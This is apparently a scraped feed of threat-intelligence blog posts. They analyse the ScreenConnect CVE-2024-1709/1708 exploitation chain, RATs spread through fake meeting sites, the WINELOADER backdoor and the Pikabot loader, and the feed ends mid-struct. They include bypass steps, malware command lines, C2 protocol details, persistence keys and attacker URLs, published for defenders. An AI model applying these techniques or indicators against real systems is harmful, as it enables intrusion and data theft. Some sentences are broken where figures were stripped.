ToolsIndicators Of Compromise (IOCs)MD5File Typee35864892846be3462139f9534d5ddb5EXE0e8d32259b06ab01cd04587b1ae5d0c1BAT Webhook URLhttps://discord[.]com/api/webhooks/1193562861071511683/Y3e960iiIYKeT-2hq8c0VDuprdKTD3u5F1f0AKfPQnQde8CoXnK2HzVoVGb6mBgXTsc6https://discordapp[.]com/api/webhooks/1197341553404956752/xoPYo_fCPQGLsUIBrreFz05R9JuX_K4L96ResReZ7oLtj1za6QSYlCuMnTB8raMpVqCw YouTube Channels[.]com/@cartistweaks/videos[.]com/@fraidtweaks Tue, 12 mar 2024 14:52:56 -0700 Preet Kamal Multiple Vulnerabilities Found In ConnectWise ScreenConnect IntroductionOn February 19, 2024, ConnectWise released an advisory disclosing critical vulnerabilities impacting ScreenConnect Remote Monitoring and Management (RMM) software. The first vulnerability, tracked as CVE-2024-1709, allows threat actors to bypass authentication and exploit a second vulnerability, CVE-2024-1708. The second vulnerability is a path traversal flaw that enables attackers to upload a malicious file, potentially leading to Remote Code Execution (RCE) on affected versions of ScreenConnect instances. The technical details of this vulnerability underscore its easy exploitability, utilizing common tactics, techniques, and procedures (TTPs) that could lead to data exfiltration and lateral movement across compromised instances. RecommendationsZscaler ThreatLabz strongly recommends on-premises users of ConnectWise ScreenConnect software to promptly upgrade to the latest version, which has crucial fixes to mitigate the vulnerabilities identified as CVE-2024-1709 and CVE-2024-1708. Affected VersionsThe following versions of ConnectWise ScreenConnect are affected by the vulnerabilities disclosed and should be updated immediately: ScreenConnect 23.9.7 and prior BackgroundConnectWise ScreenConnect enables users to manage, connect, and access systems remotely. The remote access solution is available for on-prem and cloud architectures. ConnectWise’s advisory prompted the Cybersecurity & Infrastructure Security Agency (CISA) to add CVE-2024-1709 to their Known Exploited Vulnerabilities Catalog. CVE-2024-1709 earned a critical CVSS score of 10.0, while CVE-2024-1708 received a score of 8.4. CVE-2024-1709 allows a remote attacker to gain access to systems with admin privileges. Once inside the compromised system, the attacker leverages CVE-2024-1708 to upload malicious files to the compromised system and potentially achieve RCE. An attacker can exploit these vulnerabilities to: Access, upload, or modify important files Steal sensitive information and disrupt critical services Move laterally on the breached network How It WorksThe attack sequence begins by sending a malformed HTTP request to the vulnerable ScreenConnect instance. Specifically, this means appending any character to the /SetupWizard.aspx URL (i.e., /SetupWizard.aspx<something>) to gain unauthenticated access to the /SetupWizard.aspx page. The /SetupWizard.aspx page allows the attacker to create a new user account with administrator privileges, even on a pre-configured instance, without requiring any authentication. This exploit is possible due to a flaw in the SetupWizard.aspx file, responsible for the initial administrator setup and license validation on the instance. Once inside the system, the attacker uploads a malicious ASHX ScreenConnect extension, packaged in a ZIP archive, to achieve RCE and later obtain a remote web shell. The attack sequence is shown in Figure 1. Figure 1: A diagram illustrating how an attacker targets a vulnerable ScreenConnect instance. Exploitation Steps1. Malformed HTTP Request: The attacker launches the attack by sending a malformed HTTP request to the vulnerable ScreenConnect instance as shown below. Figure 2: An example of a malformed HTTP request targeting CVE-2024-1709. The figure below shows CVE-2024-1709 exploitation via a 302 redirect to the /SetupWizard.aspx page. Figure 3: Exploitation of CVE-2024-1709. 2. Arbitrary Admin Account Creation: Upon receiving the malicious request, the ScreenConnect instance processes the request and redirects to the /SetupWizard.aspx page, where the attacker can create an administrator account as shown in Figure 4. Figure 4: The ScreenConnect page where the attacker can fraudulently create an administrator user account. The figure below includes XML showing that the attacker was able to successfully create an administrator user account. Figure 5: ScreenConnect\App_Data\User.xml shows evidence of the attacker-created administrator user account. 3. Malicious Payload Delivery: The attacker uploads a malicious ScreenConnect extension (shown in Figure 6) wrapped in a ZIP archive to the vulnerable instance. This ZIP archive contains an ASHX file designed to exploit CVE-2024-1708 and facilitate RCE on the vulnerable system. Figure 6: A POST transaction depicting the installation of a malicious extension on a ScreenConnect Instance. 4. Malicious Code Execution: Following the successful upload of the malicious ScreenConnect extension (.ashx file), the vulnerable system executes the code contained within the payload as shown in Figure 7. This execution grants the attacker unauthorized access and control over the compromised system, enabling further exploitation and privilege escalation. Figure 7: The malicious ZIP archive uploaded by the attacker containing a Base64-encoded command invoking cmd.exe for remote code execution. According to reports, the post-exploitation phase included the deployment of ToddlerShark malware, leveraging the second vulnerability. ToddlerShark malware demonstrates polymorphic behavior and utilizes legitimate Microsoft binaries and alternate data streams. It bears a striking resemblance to BabyShark malware, which has been associated with the North Korean APT group known as Kimsuky. Zscaler Best PracticesSafeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with advanced Deception turned on. Route all server traffic through Zscaler Private Access™ with the application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers. Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control (C2) domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware. Extend command-and-control (C2) protection to all ports and protocols with Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware. Use Zscaler Cloud Sandbox™ to prevent unknown malware delivered as art of a second-stage payload. Inspect all TLS/SSL traffic and restrict traffic to critical infrastructure from an allowed list of known-good destinations. ConclusionTo ensure security, ConnectWise ScreenConnect users should update their on-prem deployments to version 23.9.8 or above promptly. Cloud-based deployments, on the other hand, do not require any action as ConnectWise has already applied the necessary patches. Failing to update exposes systems to vulnerabilities such as CVE-2024-1709 and CVE-2024-1708. These vulnerabilities enable threat actors to manipulate server configurations, gain administrator-level privileges, and execute remote code. Indicators of CompromiseConnectWise reported active exploitation of CVE-2024-1709 and released the following Indicators of Compromise (IOCs): 155[.]133[.]5[.]15 155[.]133[.]5[.]14 118[.]69[.]65[.]60 Zscaler CoverageThe Zscaler ThreatLabz team has deployed the following: Zscaler Advanced Threat Protection APP.EXPLOIT.CVE-2024-1708_CVE-2024-1709 Zscaler Private Access AppProtection 6000760 - ConnectWise ScreenConnect SetupModule Authentication Bypass (CVE-2024-1709) For more details, visit the Zscaler Threat Library. Understanding the ConnectWise ScreenConnect CVE-2024-1709 & CVE-2024-1708 | Huntress Blog Detection Guidance for ConnectWise CWE-288 ( Mon, 11 mar 2024 14:30:19 -0700 Arkaprava Tripathi Android and Windows RATs Distributed Via Online Meeting Lures IntroductionBeginning in December 2023, Zscaler’s ThreatLabz discovered a threat actor creating fraudulent Skype, Google Meet, and Zoom websites to spread malware. The threat actor spreads SpyNote RAT to Android users and NjRAT and DCRat to Windows users. This article describes and shows how the threat actor’s malicious URLs and files can be identified on these fraudulent online meeting websites. Key Takeaways A threat actor is distributing multiple malware families using fake Skype, Zoom, and Google Meet websites. The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems. Campaign OverviewThe attacker utilized shared web hosting, hosting all these fake online meeting sites on a single IP address. All of the fake sites were in Russian as shown in all the figures below. In addition, the attackers hosted these fake sites using URLs that closely resembled the actual websites. Attack SequenceThe diagram below illustrates how the malware was distributed and executed on the victim's machine during the campaign: Figure 1: Attack chain and execution flow for Android and Windows campaigns. When a user visits one of the fake sites, clicking on the Android button initiates the download of a malicious APK file, while clicking on the Windows button triggers the download of a BAT file. The BAT file when executed performs additional actions, ultimately leading to the download of a RAT payload. SkypeDuring our investigation, we discovered that the first fake site, join-skype[.]info, was created in early December to deceive users into downloading a fake Skype application as shown in Figure 2. Figure 2: The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain. (Image courtesy of The Windows button pointed to a file named Skype8.exe and the Google Play button pointed at Skype.apk (neither of these files was available at the time of analysis). The Apple App Store button redirected to, indicating that the threat actor was not targeting iOS users with malware. Google MeetIn late December, the attacker created another fake site, online-cloudmeeting[.]pro, mimicking Google Meet as shown in Figure 3. The fake Google Meet site was hosted on online-cloudmeeting[.]pro/gry-ucdu-fhc/ where the subpath gry-ucdu-fhc was deliberately created to resemble a Google Meet joining link. Genuine Google Meet invite codes typically follow the structure [a-z]{3}-[a-z]{4}-[a-z]{3}. The fake site provides links to download a fake Skype application for Android and/or Windows. The Windows link leads to a BAT file named updateZoom20243001bit.bat, which in turn downloads the final payload named ZoomDirectUpdate.exe. This final payload is a WinRAR archive file that contains DCRat, packed with Eziriz .NET Reactor. Figure 3: The fake Google Meet page, showing the fraudulent domain in the address bar for a fake Google Meet Windows application link to a malicious BAT file that downloads and executes malware. The Android link in this figure led to a SpyNote RAT APK file named meet.apk. ZoomIn late January, we observed the emergence of a fake Zoom site (shown in Figure 4), us06webzoomus[.]pro. The fake Zoom site, hosted at the URL us06webzoomus[.]pro/l/62202342233720Yzhkb3dHQXczZG1XS1Z3Sk9kenpkZz09/, features a subpath that closely resembles a meeting ID generated by the Zoom client. If a user clicks the Google Play link, a file named Zoom02.apk will be downloaded containing the SpyNote RAT. Similar to the fake Google Meet site, when a user clicks the Windows button it downloads a BAT file, which in turn downloads a DCRat payload. Figure 4: The fake Zoom page, showing a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file that contains SpyNote RAT when the Google Play button is clicked. Open DirectoriesIn addition to hosting DCRat, the fake Google Meet and Zoom websites also contain an open directory (shown in Figure 5) with two additional Windows executable files named driver.exe and meet.exe (inside the archive, which are NjRAT. The presence of these files suggests that the attacker may utilize them in other campaigns, given their distinct names. Figure 5: Example of additional malicious files hosted on the websites hosting fake online meeting applications. ConclusionOur research demonstrates that businesses may be subject to threats that impersonate online meeting applications. In this example, a threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files. Our findings highlight the need for robust security measures to protect against advanced and evolving malware threats and the importance of regular updates and security patches. As cyber threats continue to evolve and become increasingly complex, it is critical to remain alert and take proactive measures to protect against them. Zscaler's ThreatLabz team is dedicated to staying on top of these threats and sharing our findings with the wider community. Zscaler Sandbox CoverageDuring our investigation of this campaign, the Zscaler sandbox played a vital role in analyzing the behavior of different files. The sandbox analysis allowed us to identify threat scores and pinpoint specific MITRE ATT&CK techniques that were triggered during the analysis process. Figure 6: DCRat Zscaler sandbox report Figure 7: NjRAT Zscaler sandbox report Zscaler’s multilayered cloud security platform detected payloads with the following threat names: Win32.Backdoor.DCRat Win32.Backdoor.NjRat MITRE ATT&CK TechniquesEnterprise MatrixTACTIC TECHNIQUE ID TECHNIQUE NAME Execution T1064 T1059.001 Scripting PowerShell Persistence T1547.001 Registry Run Keys / Startup Folder Privilege Escalation T1547 Boot or Logon Autostart Execution Defense Evasion T1140 T1064 T1027 T1027.002 T1070.004 T1036 Deobfuscate/Decode Files or Information Scripting Obfuscated Files or Information Software Packing File Deletion Masquerading Credential Access T1056 T1555 Input Capture Credentials from Password Stores Discovery T1124 T1083 T1082 T1518.001 T1057 T1010 T1018 T1016 T1120 System Time Discovery File and Directory Discovery System Information Discovery Security Software Discovery Process Discovery Application Window Discovery Remote System Discovery System Network Configuration Discovery Peripheral Device Discovery Collection T1123 T1115 T1056 T1113 T1125 Audio Capture Clipboard Data Input Capture Screen Capture Video Capture Command and Control T1219 T1573 T1571 T1095 T1071 Remote Access Software Encrypted Channel Non-Standard Port Non-Application Layer Protocol Application Layer Protocol Impact T1498 T1529 Network Denial of Service System Shutdown/Reboot Mobile MatrixTACTIC TECHNIQUE ID TECHNIQUE NAME Persistence T1624 T1444 Event Triggered Execution: Broadcast Receivers Masquerade as Legitimate Application Privilege Escalation, Persistence T1626 T1546 Abuse Elevation Control Mechanism Event Triggered Execution Collection T1533 T1429 T1430 T1636 Data from Local System Audio Capture Location Tracking Contact and SMS data Tue, 05 mar 2024 08:30:01 -0800 Himanshu Sharma European diplomats targeted by SPIKEDWINE with WINELOADER IntroductionZscaler's ThreatLabz discovered a suspicious PDF file uploaded to VirusTotal from Latvia on January 30th, 2024. This PDF file is masqueraded as an invitation letter from the Ambassador of India, inviting diplomats to a wine-tasting event in February 2024. The PDF also included a link to a fake questionnaire that redirects users to a malicious ZIP archive hosted on a compromised site, initiating the infection chain. Further threat hunting led us to the discovery of another similar PDF file uploaded to VirusTotal from Latvia in July 2023.This blog provides detailed information about a previously undocumented backdoor we named ‘WINELOADER'. We believe that a nation-state threat actor, interested in exploiting the geopolitical relations between India and diplomats in European nations, carried out this attack. The attack is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed in the malware and command and control (C2) infrastructure. While we have not yet attributed this attack to any known APT group, we have named this threat actor SPIKEDWINE based on the wine-related theme and filenames used in different stages of the attack chain, and our investigation into the case is ongoing.Key Takeaways Low-volume targeted attack: The samples intentionally targeted officials from countries with Indian diplomatic missions, although VirusTotal submissions indicate a specific focus on European diplomats. New modular backdoor: WINELOADER has a modular design, with encrypted modules downloaded from the command and control (C2) server. Evasive tactics: The backdoor employs techniques, including re-encryption and zeroing out memory buffers, to guard sensitive data in memory and evade memory forensics solutions. Compromised infrastructure: The threat actor utilized compromised websites at multiple stages of the attack chain. Attack Chain Figure 1 below illustrates the multi-stage attack chain at a high level. Figure 1: Multi-stage attack chain of WINELOADER. Technical AnalysisIn this section, we provide a detailed analysis of each component of the attack chain initiated when a victim receives and clicks on the link within the PDF.PDF analysisThe PDF file is a fake invitation to a wine-tasting event purported to take place at the Indian ambassador’s residence on February 2nd, 2024. The contents are well-crafted to impersonate the Ambassador of India. The invitation contains a link to a fake questionnaire, which kickstarts the infection chain.The malicious link in the PDF invitation redirects users to a compromised site, hxxps://seeceafcleaners[.]co[.]uk/wine.php, that proceeds to download a ZIP archive containing an HTA file - wine.hta.Figure 2 below shows the contents of the PDF file.Figure 2: The PDF invitation showcasing the malicious link.A quick analysis of the PDF file's metadata reveals that it was generated using LibreOffice version 6.4, and the time of creation was January 29th, 2024, at 10:38 AM UTC.HTA file analysisThe HTA file downloaded in the previous section contains obfuscated JavaScript code, which executes the next stage of malicious activities. The obfuscation technique used in the code exhibits patterns that match those of the publicly available obfuscator 3 below shows a preview of the code inside the HTA file. Decoy content is displayed to the victim to disguise malicious activity. This content is similar to what was displayed in the original PDF (Figure 2 above) and includes information about the wine-tasting event in February 2024.Figure 3: Obfuscated JavaScript code inside the HTA file.The HTA file performs the following key functions:Downloads a Base64 encoded text file from the URL: seeceafcleaners[.]co[.]uk/cert.phpSaves the text file to the path: C:\Windows\Tasks\text.txtUses certutil.exe to Base64 decode the text file and write the result to a ZIP archive with the path: C:\Windows\Tasks\ The command used is: certutil -decode C:\Windows\Tasks\text.txt C:\Windows\\Tasks\text.zipExtracts the contents of the ZIP archive to the path: C:\Windows\Tasks\. The command used is: tar -xf C:\Windows\Tasks\ -C C:\Windows\Tasks\. The ZIP archive contains two files named sqlwriter.exe and vcruntime140.dll. Here, sqlwriter.exe is the legitimate binary signed by Microsoft and vcruntime140.dll is the malicious DLL crafted by the attacker which will be side-loaded automatically when sqlwriter.exe is executed. Per our research, sqlwriter.exe has never been abused in-the-wild by any threat actor for DLL side-loading (at least to the best of our knowledge). This implies that the threat actor in this case put in extra effort to identify a signed Microsoft executable vulnerable to DLL side-loading.Executes sqlwriter.exe from the path: C:\Windows\Tasks\ which will kick start the infection chain.WINELOADER binary analysisWhen executing sqlwriter.exe, it loads a malicious DLL named vcruntime140.dll from the same directory using DLL side-loading. The exported function set_se_translator is then executed. This function decrypts the embedded WINELOADER core module within the DLL using a hardcoded 256-byte RC4 key before executing it. This is shown in the screenshot below.Figure 4: Code section that decrypts and executes the WINELOADER core module.Each module consists of configuration data (e.g., C2 polling interval), an RC4 key, and encrypted strings, followed by the module code. Part of the decrypted WINELOADER core module is shown in Figure 5 below.Figure 5: Data structure containing relevant configuration, RC4 key, encrypted strings, and the module.WINELOADER employs the following techniques to evade detection:Sensitive data is encrypted with a hardcoded 256-byte RC4 key. The sensitive data includes:The core module and subsequent modules downloaded from the C2 server Strings (e.g. DLL filenames and API import function names)Data sent and received from the C2 serverSome strings are decrypted on use and re-encrypted shortly after.Memory buffers for storing results from API calls or decrypted strings are zeroed after use.DLL hollowing is then used to inject WINELOADER into a randomly selected DLL from the Windows system directory. The implementation is similar to the one presented by SECFORCE in their blog. WINELOADER includes additional randomization code to ensure that different DLLs are chosen for each instance of DLL hollowing (see Figure 6).Figure 6: The randomization code used when selecting a Windows system DLL for DLL hollowing.WINELOADER is not injected into the following DLLs as they contain exported functions used by the malware:advapi32.dllapi-ms-win-crt-math-l1-1-0.dllapi-ms-win-crt-stdio-l1-1-0.dllbcryptprimitives.dlliphlpapi.dllkernel32.dllkernelbase.dllmscoree.dllntdll.dllole32.dllrpcrt4.dllshlwapi.dlluser32.dllwininet.dllWINELOADER will inject itself into another randomly selected DLL again via DLL hollowing before it sends the first beacon request to the C2 server.The beacon request is an HTTP GET request containing a request body, which is unusual for GET requests. All requests to the C2 server use the same User-Agent, Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1, hardcoded into the sample itself.The body of the HTTP GET request is encrypted with the same 256-byte RC4 key and the fields are as follows. We have appended a question mark to fields that we are unable to conclusively verify due to the limited data collected. This information in available in the table below.OffsetLengthNameDescription0x02Length of padding bytes (n)This value is randomized (min: 255, max: 65535), stored in little-endian (LE).0x2nPadding bytesPadding bytes are randomly generated with the ProcessPrng API.0x2 + n8Campaign ID?5F D5 97 93 ED 26 CB 5A in the analyzed sample.0xa + n8Session ID?Randomly generated on execution.0x12 + n 8Local IP addressThe local IP address of the infected machine.0x20 + n512Parent process nameIn Unicode0x220 + n512User nameIn Unicode0x420 + n30Machine nameIn Unicode0x43e + n4Parent process IDIn little-endian0x442 + n1Parent process token elevation typeInformation about the privileges of the token linked to the parent process.0x443 + n8Polling interval for C2 requestsC0 d4 01 00 00 00 00 00 in the analyzed sample, translates to 120,000 ms or 2 mins between requests.0x44b + n1Request type?1 for beacon, 2 for status update0x44c + n8Length of messageIn little-endian. 0 for beacon requests0x454 + n8Unknown?Observed to match the value of the request type field.0x45c + n8Module ID?00 00 00 00 00 00 00 for the core module and 6B 19 A8 D2 69 2E 85 64 for the persistence module.0x464 + nVariesMessageOnly observed for type 2 requests.Table 1: WINELOADER C2 beacon request fieldsAn example beacon request is shown below. The value of the Content-Length header varies across requests, as the padding length is randomized with a minimum of 1,381 bytes.GET /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1 Host: Content-Length: 54674 54,674 bytes of binary data in the request body (not shown here)The same RC4 key is then used to decrypt the response from the C2 server. The fields for the decrypted response are shown in the table below.OffsetLengthNameDescription0x02Length of padding bytes (n)This value is stored in little-endian (LE).0x2nPadding bytesUnused bytes0x2 + n8Campaign ID?5F D5 97 93 ED 26 CB 5A in the analyzed sample0xa + n1CommandCommand from C20xb + n VariesCommand dataBinary data for commandTable 2: WINELOADER C2 response fieldsThe core module supports three commands:Execute modules from the C2 either synchronously or asynchronously (via CreateThread)Inject itself into another DLLUpdate the sleep interval between beacon requestsDuring our research, we obtained a persistence module from the C2 server. This module copies sqlwriter.exe and vcruntime.dll into the C:\Windows\Tasks directory and creates a scheduled task named MS SQL Writer with the description SQL Server VSS Writer 64-bit to execute C:\Windows\Tasks\sqlwriter.exe daily.The persistence module offers an alternative configuration to establish registry persistence at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer.After establishing persistence for WINELOADER, the module sends an HTTP POST request to notify the C2 server about the completed task. The request body mirrors the structure of the beacon request.Command And Control Infrastructure The threat actor leveraged compromised network infrastructure at all stages of the attack chain. We identified three compromised websites used for hosting intermediate payloads or as C2 servers. Based on our in-depth analysis of the C2 communication, we believe the C2 server only responds to specific types of requests at certain times. This measure prevents automated analysis solutions from retrieving C2 responses and modular payloads. Conclusion The threat discussed in this blog demonstrated advanced tactics, techniques, and procedures (TTPs), displaying a keen interest in exploiting the diplomatic relations between India and Europe. The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions. While we cannot currently attribute this activity to any known nation-state threat actor, we continue to monitor any new developments associated with this threat actor and ensure the necessary protections for our customers against these threats. Zscaler Coverage Figure 7: Zscaler sandbox detection report In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to WINELOADER at various levels with the following threat names: Win64.Downloader.WineLoader Indicators Of Compromise (IOCs) SHA256 Description 72b92683052e0c813890caf7b4f8bfd331a8b2afc324dd545d46138f677178c4 vcruntime140.dll (WINELOADER core module loader) ad43bbb21e2524a71bad5312a7b74af223090a8375f586d65ff239410bbd81a7 wine.pdf (July 2023 invitation) 3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9 wine.pdf (Feb 2024 invitation) 1c7593078f69f642b3442dc558cddff4347334ed7c96cd096367afd08dca67bc wine.hta e477f52a5f67830d81cf417434991fe088bfec21984514a5ee22c1bcffe1f2bc WINELOADER core module f61cee951b7024fca048175ca0606bfd550437f5ba2824c50d10bef8fb54ca45 WINELOADER core module (RC4-encrypted) c1223aa67a72e6c4a9a61bf3733b68bfbe08add41b73ad133a7c640ba265a19e WINELOADER persistence module loader b014cdff3ac877bdd329ca0c02bdd604817e7af36ad82f912132c50355af0920 WINELOADER persistence module 7600d4bb4e159b38408cb4f3a4fa19a5526eec0051c8c508ef1045f75b0f6083 WINELOADER persistence module (RC4-encrypted) URL Description hxxps://castechtools[.]com/api.php WINELOADER C2 hxxps://seeceafcleaners[.]co[.]uk/cert.php Downloads base64-encoded ZIP archive from this URL. hxxps://seeceafcleaners[.]co[.]uk/wine.php Downloads the ZIP archive containing the wine.hta file. hxxps://passatempobasico[.]com[.]br/wine.php Downloads the ZIP archive containing the wine.hta file (IOC from July 2023). MITRE ATT&CK Framework ID Tactic Description T1204.002 User Execution: Malicious File The PDF file that masquerades as an invitation contains a malicious link. T1656 Impersonation The contents of the PDF are crafted to impersonate the Ambassador of India. T1204.001 User Execution: Malicious Link The PDF file contains a link that leads to the download of a malicious ZIP archive. T1574.002 Hijack Execution Flow: DLL Side-Loading sqlwriter.exe is used to DLL side-load vcruntime140.dll. T1055.001 Process Injection: Dynamic-link Library Injection DLL hollowing is used to load a randomly chosen system DLL into sqlwriter.exe process memory and inject WINELOADER in that DLL. T1573.001 Encrypted Channel: Symmetric Cryptography RC4 stream cipher is used to encrypt the data exchanged between WINELOADER and the C2 server. T1041 Exfiltration Over C2 Channel Data is encrypted and exfiltrated to the C2 server. T1584 Compromise Infrastructure Compromised sites are used for hosting payloads and as a C2 server. T1053.005 Scheduled Task/Job: Scheduled Task A scheduled task with the name “MS SQL Writer” is created to ensure sqlwriter.exe is executed to kick-start the infection chain. T1547.001 Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder WINELOADER can be configured to execute on Windows startup by setting the registry key at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer. T1140 Deobfuscate/Decode Files or Information WINELOADER strings and modules are encrypted with RC4. Sensitive data is often re-encrypted or zeroed out after use. T1036.001 Masquerading: Invalid Code Signature vcruntime140.dll has an invalid Microsoft code signing certificate. T1036.004 Masquerading: Masquerade Task or Service The scheduled task created for persistence masquerades as a legitimate Microsoft scheduled task. T1027.007 Obfuscated Files or Information: Dynamic API Resolution API names are decrypted before they are dynamically resolved and called. T1027.009 Obfuscated Files or Information: Embedded Payloads WINELOADER modules are encrypted with RC4 within vcruntime140.dll and C2 responses. T1218.005 System Binary Proxy Execution: Mshta mshta.exe executes wine.hta, which contains malicious JS downloader code. T1033 System Owner/User Discovery WINELOADER sends the current user and system name in each C2 request. T1071.001 Application Layer Protocol: Web Protocols WINELOADER communicates with its C2 via HTTPS. HTTP GET requests contain a request body that is atypical of such requests. T1001.001 Data Obfuscation: Junk Data WINELOADER prepends a randomized number of junk bytes to the request data before encrypting and sending it to the C2. Appendix Below is the full 256-byte RC4 key embedded inside WINELOADER that is used to encrypt and decrypt the information exchanged between the malware and the C2 server. Tue, 27 feb 2024 09:32:38 -0800 Sudeep Singh The (D)Evolution of Pikabot Introduction Pikabot is a malware loader that originally emerged in early 2023. Over the past year, ThreatLabz has been tracking the development of Pikabot and its modus operandi. There was a significant increase in usage of Pikabot in the second half of 2023, following the FBI-led takedown of Qakbot. This was likely the result of a BlackBasta ransomware affiliate replacing Qakbot with Pikabot for initial access. However, Pikabot ceased activity shortly after Christmas 2023, with its version number being 1.1.19 at that time. In recent campaigns, which started in February 2024, Pikabot reemerged with significant changes in its code base and structure. Although it appears to be in a new development cycle and testing phase, the developers have reduced the complexity of the code by removing advanced obfuscation techniques and changing the network communications. Key Takeaways Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023. In December 2023, Pikabot activity ceased, possibly as a result of a new version of Qakbot that emerged. In February 2024, a new version of Pikabot was released with significant changes. Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms. Pikabot now stores all configuration elements in a single memory block, similar to Qakbot. In prior versions, Pikabot decrypted necessary configuration elements only when required. Pikabot continues to use HTTP for command-and-control, but its network protocol has changed, including the network command IDs and the encryption algorithms. Technical AnalysisAs covered in our previous technical analysis of Pikabot, the malware consists of two components: a loader and a core module. The core module is responsible for executing commands and injecting payloads from a command-and-control server. The malware uses a code injector to decrypt and inject the core module. It employs various anti-analysis techniques and string obfuscation. Pikabot uses similar distribution methods, campaigns, and behaviors as Qakbot. The malware acts as a backdoor, allowing the attacker to control the infected system and distribute other malicious payloads such as Cobalt Strike.In the following sections, we will describe the latest Pikabot variant, including its capabilities and notable changes compared to previous versions. The analysis was performed on Pikabot binaries with version 1.8.32.Anti-analysis techniquesAs with previous versions of Pikabot, this variant employs a series of different anti-analysis techniques to make the analysis more time-consuming. It should be noted that none of the methods below presents any significant advanced capabilities. Furthermore, Pikabot used a series of more advanced detection features in its loader component in previous versions of the malware.Strings encryptionThe most notable change is the string obfuscation. In previous versions of Pikabot, each string was obfuscated by combining the RC4 algorithm with AES-CBC. This method was highly effective in preventing analysis, particularly when it came to automated configuration extraction. To successfully analyze Pikabot, an analyst would need to detect not only the encrypted string but also its unique RC4 key. Additionally, they would need to extract the AES key and initialization vector, which are unique to each Pikabot payload.It should be noted that the approach the Pikabot malware developers followed is similar to the ADVobfuscator.In the latest version of Pikabot, the majority of the strings are either constructed by retrieving each character and pushing it onto the stack (Figure 1) or, in some rare cases, a few strings are still encrypted using the RC4 algorithm only.Figure 1. String stack constructionJunk instructionsThis anti-analysis technique was also implemented in previous versions of Pikabot. Pikabot inserts junk code between valid instructions. The junk code is either inlined in the function or a call is made to a function, which contains the junk code (Figure 2).Figure 2. Junk codeAnti-debug methodsPikabot uses two methods to detect a debugging session. They are:Reading the BeingDebugged flag from the PEB (Process Environment Block).Calling the Microsoft Windows API function CheckRemoteDebuggerPresent.Pikabot constantly performs the debugging checks above in certain parts of its code. For example, when it (en/de)codes network data or when it makes a request to receive a network command.Anti-sandbox evasionIn addition to the anti-debugging checks above, Pikabot uses the following methods to evade security products and sandboxes:Pikabot utilizes native Windows API calls.Pikabot delays code execution at different stages of its code. The timer is randomly generated each time.Pikabot dynamically resolves all required Windows API functions via API hashing.A Python representation of the algorithm is available below.api_name = b"" checksum = 0x113B for c in api_name: if c > 0x60: c -= 0x20 checksum = (c + (0x21 * checksum)) & 0xffffffff print(hex(checksum))Language detectionIdentical to previous versions, Pikabot stops execution if the operating system's language is any of the following:Russian (Russia)Ukrainian (Ukraine)This is likely an indication that the threat actors behind Pikabot are Russian-speaking and may reside in Ukraine and/or Russia. The language check reduces the chance of law enforcement action and potential criminal prosecution in those regions.Bot initialization phaseUnlike previous versions, this version of Pikabot stores all settings and information in a single structure at a global address (similar to Qakbot). The analyzed structure is shown below. For brevity, we redacted non-important items of the structure (such as Windows API names).struct bot_structure { void *host_info; WINHTTPAPI winhttp_session_handle; bool bot_error_init_flag; FARPROC LdrLoadDll; FARPROC LdrGetProcedureAddress; FARPROC RtlAllocateHeap; FARPROC RtlReAllocateHeap; FARPROC RtlFreeHeap; FARPROC RtlDecompressBuffer; FARPROC RtlGetVersion; FARPROC RtlRandomEx; ---redacted— wchar_t* bot_id; bool registered_flag; int process_pid; int process_thread_id; int* unknown_unused_1; unsigned short os_arch; unsigned short dlls_apis_loaded_flag; int unknown_unused_2; unsigned char* host_rc4_key; int number_of_swap_rounds; int beacon_time_ms; int delay_time_ms; // Used only during the initialization phase of Pikabot. int delay_seed_mul; wchar_t* bot_version; wchar_t* campaign_tag; wchar_t* unknown_registry_key_name; cncs_info* active_cnc_info; cncs_info* cncs_list; int num_of_cncs; int unknown_unused_3; int max_cnc_attempts; wchar_t* user_agent; void* uris_array; void* request_headers_array; TEB* thread_environment_block; }; struct cncs_info { wchar_t* cnc; int cnc_port; int http_connection_settings; // If set to 1 then server’s certificate validation is ignored and sets the flags WINHTTP_FLAG_SECURE | WINHTTP_FLAG_BYPASS_PROXY_CACHE int connection_attempts; bool is_cnc_unavailable; cncs_info* next_cnc_ptr; };Bot configurationThe latest version of Pikabot stores its entire configuration in plaintext in one address. This is a significant drawback since in previous versions, Pikabot decrypted each required element at runtime and only when required. In addition, many of the configuration elements (e.g. command-and-control URIs) were randomized. ANALYST NOTE: Despite their randomization, all configuration elements were valid on the server-side. If a bot sent incorrect information, then it would get rejected/banned by the command-and-control server.The configuration structure is the following:struct configuration { int number_of_swap_rounds_number_of_bytes_to_read_from_end; // During the bot initialization process, this member represents the number of bytes to read from the end of the configuration block. size_t len_remaining_structure; // Size of the remaining structure's data minus the last element wchar_t* bot_minor_version; // E.g. 32-beta. In some samples, this member contains both the major and minor versions of the bot. size_t len_campaign_name; wchar_t* campaign_name; size_t len_unknown_registry_key_name; wchar_t* unknown_registry_key_name; // Used only in the network command 0x246F. size_t len_user_agent; wchar_t* user_agent; size_t number_of_http_headers; wchar_string request_headers[number_of_http_headers]; int number_of_cnc_uris; wchar_string cnc_uris[number_of_cnc_uris]; int number_of_cncs; cnc 